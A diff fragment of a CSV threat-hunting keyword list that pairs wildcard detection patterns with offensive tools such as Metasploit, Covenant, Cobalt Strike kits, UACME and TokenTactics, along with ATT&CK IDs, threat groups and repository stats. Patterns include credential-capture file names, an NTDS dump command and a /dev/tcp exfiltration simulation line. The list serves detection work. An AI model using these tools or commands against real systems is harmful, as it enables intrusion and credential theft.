TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*CandyPotato.exe *","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*canix1/ADACLScanner*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" -"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Cannot enumerate antivirus*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*capcom_sys_exec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*capcom_sys_exec.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*CaptainNox/Hypnos*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" "*captcha-killer.*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*CapturedCredential.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedCredential.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedHashCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedPasswordCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*CapturedTicketCredential.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*capturetokenphish.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*capturetokenphish.py*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*CarbonCopy*","offensive_tool_keyword","CarbonCopy","A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux","T1606 - T1553 - T1105 - T1027 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/paranoidninja/CarbonCopy","1","0","N/A","N/A","10","1185","276","2020-10-03T03:23:20Z","2018-11-14T04:48:10Z" "*CarbonCopy.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*cardano2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*careCrow*_linux_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*cargo install glit*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*carlospolop/PurplePanda*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*cat *.bin | base64 -w 0 > *.txt*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*cat *.ntds","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*cat ./apache-tomcat-8.5.77/webapps/ROOT/tomcatwar.jsp","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*cat > /dev/tcp/127.0.0.1*<*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*catphish.rb*","offensive_tool_keyword","catphish","Generate similar-looking domains for phishing attacks. Check expired domains and their categorized domain status to evade proxy categorization. Whitelisted domains are perfect for your C2 servers. Perfect for Red Team engagements.","T1565 - T1566 - T1567 - T1596","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ring0lab/catphish","1","1","N/A","N/A","6","583","131","2018-10-16T12:57:25Z","2016-10-24T22:48:51Z" -"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*cb1bf87f2976eb49c5560b16a69c742b39706c48314bcc0bdeeaf545910bd380*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CB561720-0175-49D9-A114-FE3489C53661*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*CC127443-2519-4E04-8865-A6887658CDE5*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*cc2_keystrokes*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cc2_keystrokes_*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" @@ -8303,17 +8450,17 @@ "*cc2_udp_server*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*cc2FilesColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*cc2ProcessColor.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 